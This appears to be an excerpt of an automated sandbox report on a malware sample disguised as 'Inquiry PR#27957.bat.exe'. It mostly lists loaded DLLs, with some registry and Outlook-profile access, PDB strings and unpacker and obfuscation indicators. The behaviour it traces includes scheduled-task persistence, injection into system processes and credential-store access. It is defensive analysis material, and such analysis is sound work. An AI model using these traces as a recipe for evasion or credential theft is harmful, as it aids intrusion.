            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Inquiry PR#27957.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Inquiry PR#27957.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TsdBVAGjsKVoi.exe, 00000010.00000002.3785830920.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710209897.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3785833047.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Inquiry PR#27957.bat.exe, --.cs.Net Code: _0006 System.AppDomain.Load(byte[])
            Source: fuqwoDzun.exe.0.dr, --.cs.Net Code: _0006 System.AppDomain.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.7210000.4.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.2f4b620.1.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_0543FD12 pushfd ; iretd 0_2_0543FD19
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_07342C92 push E8FFFFFFh; iretd 0_2_07342C9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004181F4 push ecx; ret 9_2_004181F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040D27F push ds; ret 9_2_0040D28D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004033F0 push eax; ret 9_2_004033F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A478 push 00000025h; iretd 9_2_0041A534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042DC13 push edi; ret 9_2_0042DC1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00413CE1 push 57C83816h; retf 9_2_00413D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042349F pushfd ; ret 9_2_004234A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00413D6A push 57C83816h; retf 9_2_00413D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A515 push 00000025h; iretd 9_2_0041A534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A624 push ecx; retf 9_2_0041A625
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040C68F push esi; ret 9_2_0040C691
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041377B push es; retf 9_2_00413782
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040872A push ecx; ret 9_2_0040872B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F225F pushad ; ret 9_2_015F27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F27FA pushad ; ret 9_2_015F27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD push ecx; mov dword ptr [esp], ecx9_2_016209B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F283D push eax; iretd 9_2_015F2858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F1365 push eax; iretd 9_2_015F1369
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_06912C92 push E8FFFFFFh; iretd 10_2_06912C9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C54D pushfd ; ret 14_2_0114C54E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C54F push 8B010D67h; ret 14_2_0114C554
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011009AD push ecx; mov dword ptr [esp], ecx14_2_011009B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C9D7 push edi; ret 14_2_0114C9D9
